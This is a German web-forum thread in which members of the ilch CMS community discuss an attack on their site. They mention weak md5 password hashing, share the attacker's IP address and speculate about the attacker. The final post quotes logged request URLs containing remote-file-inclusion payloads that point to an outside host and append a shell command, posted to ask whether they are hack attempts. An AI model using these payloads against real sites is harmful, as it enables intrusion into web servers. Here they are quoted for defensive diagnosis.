ilch Forum » Allgemein » Plauder Ecke » Nach dem Angriff

Geschlossen
  1. #31
    User Pic
    oink Mitglied
    Registriert seit
    23.09.2010
    Beitrge
    740
    Beitragswertungen
    227 Beitragspunkte
    Sorry dafür, fix ist ja in arbeit ^^
    before creation there must be destruction
    0 Mitglieder finden den Beitrag gut.
  2. #32
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beitrge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    ZitatZitat geschrieben von kdl

    Ich hoffe doch, dass die Passwörter hier auf ilch anständig gehasht sind. Ansonsten wird das sicher noch Auswirkung auf viele andere Seiten haben, da die wenigsten ein sicheres Passwort haben und sowieso überall das gleiche nutzen.


    Mehr als der einfache md5-hash Funktion wird hier auch nicht verwendet.


    Zuletzt modifiziert von Revolution am 18.12.2011 - 22:55:27
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  3. #33
    User Pic
    Ahrtas Moderator
    Registriert seit
    17.12.2007
    Beitrge
    2.368
    Beitragswertungen
    210 Beitragspunkte
    ZitatZitat geschrieben von Chapter

    ZitatZitat geschrieben von Ahrtas

    Hast du was gegen Türken?


    Wie kommst du darauf?
    Mir ist lediglich aufgefallen das vermehrt türkische Hacker am Werk sind und mehr nicht!
    Zieh mal keine voreiligen Schlüsse !
    Ich habe nur eine Frage gestellt - ich habe nichts im vorraus gesagt das du was gegen sie hast. zwinker Daher gilt dein letzter satz eher für dich oder?

    Ich hoffe mal das bei ilch2.0 sowas nicht passiert da unser koernerWS drann proggrammiert - wobei google sein Portfolio wegen virenverdacht gesperrt hat xD bis er es offline genommen hat.
    1 Mitglieder finden den Beitrag gut.
  4. #34
    User Pic
    KoernerWS gelschter User
    Mein Portfolio habe ich aber nicht selbst geschrieben gehabt. :-)
    0 Mitglieder finden den Beitrag gut.
  5. #35
    User Pic
    Ahrtas Moderator
    Registriert seit
    17.12.2007
    Beitrge
    2.368
    Beitragswertungen
    210 Beitragspunkte
    ZitatZitat geschrieben von KoernerWS

    Mein Portfolio habe ich aber nicht selbst geschrieben gehabt. :-)
    stimmt - habe ich aber auch nicht gesagt :-)
    Aber sicherlich war das kein schwerwiegender Fehler, warscheinlich ein Backdoor im Script - selbes Spiel war bei mir der Fall vor ca. einem Jahr allerdings beim osCommerce-Script. (1 Tag und google hatte kein Problem mehr)

    Und ich meine ja nur wenn du mit so einem "Witz" tagelang nicht klar kommst und deswegen dann dein Portfolio offline nimmst, wie sieht es dann mit dem "eigenen" CMS aus an dem du arbeitest. :/

    Aber gut naja was solls is ja nicht mein Problem... lcheln
    0 Mitglieder finden den Beitrag gut.
  6. #36
    User Pic
    feldmarschall Mitglied
    Registriert seit
    18.04.2009
    Beitrge
    59
    Beitragswertungen
    0 Beitragspunkte
    Also mit der IP kann ich dienen:

    46.12.239.180


    Der Gute war so dumm, unter meinem Admin Account seine Hackmeldung zu veröffentlichen, während ich auf der Seite unterwegs war. Ein Blick und Abgleich auf den IP Logger und schon ist er nicht mehr völlig anonym zwinker
    Taucht ein Genie auf, verbrüdern sich die Dummköpfe.
    Jonathan Swift, englischer Schriftsteller (1667-1745)
    0 Mitglieder finden den Beitrag gut.
  7. #37
    User Pic
    SeToY Mitglied
    Registriert seit
    29.06.2006
    Beitrge
    1.928
    Beitragswertungen
    43 Beitragspunkte
    Griechenland...
    0 Mitglieder finden den Beitrag gut.
  8. #38
    User Pic
    Anarchy 90210 Mitglied
    Registriert seit
    15.05.2007
    Beitrge
    578
    Beitragswertungen
    1 Beitragspunkte
    Und wer macht sowas ohne Proxy? Bitte nochmal drüber nachdenken :p
    1 Mitglieder finden den Beitrag gut.
  9. #39
    User Pic
    SeToY Mitglied
    Registriert seit
    29.06.2006
    Beitrge
    1.928
    Beitragswertungen
    43 Beitragspunkte
    ZitatZitat geschrieben von Anarchy 90210

    Und wer macht sowas ohne Proxy? Bitte nochmal drüber nachdenken :p


    Darauf wollte ich hinaus ^^
    0 Mitglieder finden den Beitrag gut.
  10. #40
    User Pic
    feldmarschall Mitglied
    Registriert seit
    18.04.2009
    Beitrge
    59
    Beitragswertungen
    0 Beitragspunkte
    Hat Google ausgespuckt:

    www.youtube.com/watch?v=xDPQnNTRqUE

    Da das Video von 2010 ist, und dort schon das Hack Bild verwendet wurde scheint da jemand schon länger aktiv zu sein.
    Taucht ein Genie auf, verbrüdern sich die Dummköpfe.
    Jonathan Swift, englischer Schriftsteller (1667-1745)
    0 Mitglieder finden den Beitrag gut.
  11. #41
    User Pic
    Ahrtas Moderator
    Registriert seit
    17.12.2007
    Beitrge
    2.368
    Beitragswertungen
    210 Beitragspunkte
    kann jemand von euch etwas damit anfangen oder sagen wie es dazu kommt das dieser Link aufgerufen wird?

    ZitatZitat
    index.php?startseite=!S!WCRTESTINPUT000000%3C%3E%3c%3e%253c%253e!E!


    Also jetzt nur das Fettgedruckte...


    Ich hab vor einiger Zeit ein Counter-Script gebastelt das die Seitenaufrufe zählt und die dazugehörige URL speichert die aufgerufen wurde und mir die Ergebnisse in der ilch-Statistik anzeigt.

    Jetzt wurde aber dieser Anhängsel bei mehreren Seiten mitdrangehängt also z.B. auch bei kontakt und impressum - nur bei selbst erstellte Textseiten.



    Dinge wie z.B.:
    ZitatZitat
    index.php?Npage=-1&content_dir=http://62.141.58.186/google.txt%00&cmd=ls
    und
    ZitatZitat
    index.php?_CONFIG[files][functions_page]=http://62.141.58.186/google.txt
    wurden auch aufgezeichnet.

    Wenn man z.B. die darin vorkommende IP aufruft kommt man auf die Seite von "Au Pair Ocean" - eine Seite mit irgendwelchen Gastfamilien whatever.


    Wollte es nur mal posten falls es mit einem (Hack-)Versuch zusammenhängen könnte oder von euch jemand etwas damit anfangen kann...

    Wie gesagt ist mir eben in meiner Statistik aufgefallen und sah sie auch erst nach dem Angriff hier bei ilch.
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurck zu Plauder Ecke

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten